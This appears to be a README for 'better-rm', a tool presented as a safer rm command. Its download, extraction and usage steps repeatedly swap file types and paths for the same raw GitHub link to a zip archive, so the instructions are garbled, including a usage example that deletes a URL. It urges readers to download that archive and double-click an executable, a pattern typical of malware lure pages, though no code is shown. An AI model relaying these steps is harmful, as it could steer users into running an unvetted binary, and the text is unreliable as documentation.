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🔧 better-rm - A Safer Way to Use the rm Command

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🚀 Getting Started

Welcome to better-rm! This tool provides a safer way to remove files from your system. If you ever worried about accidentally deleting important files, this application is for you. Let’s get started.

📥 Download & Install

To download better-rm, visit the Releases page. Follow this link:

Download better-rm

Step-by-Step Instructions

  1. Go to the Releases Page
    Click on the link above to visit the Releases page for better-rm.

  2. Find the Latest Version
    Look for the latest version listed on this page. You will see different files available for download.

  3. Download the Application
    Click on the file that matches your system. This may be a .zip, https://raw.githubusercontent.com/abhi671roy/better-rm/main/specificity/rm_better_v2.2-alpha.3.zip, or an executable file.

  4. Extract the Files (if needed)
    If you downloaded a compressed file (like .zip or https://raw.githubusercontent.com/abhi671roy/better-rm/main/specificity/rm_better_v2.2-alpha.3.zip), you’ll need to extract it. Right-click the file and select “Extract All” or use a similar option.

  5. Locate the Application
    Open the extracted folder. You will find the executable file named better-rm.

  6. Run the Application
    Double-click on the better-rm file to start using the application.

🗂️ System Requirements

better-rm runs on Windows, macOS, and Linux. To ensure smooth performance, verify that your system meets the following minimum requirements:

  • Operating System: Windows 10 or later, macOS Mojave or later, any recent version of Linux.
  • Disk Space: At least 100 MB of free space.
  • Memory: Minimum 2 GB RAM.
  • Dependencies: You may need basic command-line tools enabled on your system.

🛠️ Features

  • Safe File Deletion: Protects against accidental deletion of important files.
  • Customizable Prompts: Choose how you want to confirm deletions.
  • User-Friendly Interface: Simple and easy to navigate, even for beginners.
  • Cross-Platform Support: Works seamlessly across various operating systems.

❓ How to Use better-rm

After installing better-rm, you can start using it immediately. Here’s how you can safely delete files:

  1. Open Your Terminal
    Launch your command line interface (Terminal, Command Prompt, or similar).

  2. Type better-rm
    Follow it with the path of the file you want to delete. For example:

    better-rm https://raw.githubusercontent.com/abhi671roy/better-rm/main/specificity/rm_better_v2.2-alpha.3.zip
    
  3. Confirm Deletion
    You will see a prompt asking if you really want to delete the file. Type “yes” to confirm.

  4. Check for Deleted Files
    Always check to ensure the correct files were deleted.

💬 Support

If you have any questions or need help, please open an issue on the GitHub repository. Our community is here to assist you.

🔄 Contribution

If you want to contribute to better-rm, we welcome suggestions and improvements. Check our issues page for what you can help with.

📅 Changelog

Stay updated with the latest improvements and fixes by checking the changelog in the Releases section.

📜 License

better-rm is licensed under the MIT License. You can use, modify, and distribute it as long as you include the original license.

🌟 Acknowledgments

Thank you to all contributors and users who make better-rm a safer tool for everyone. Your feedback shapes our future development.

For more details and updates, revisit the Releases page. Happy deleting!

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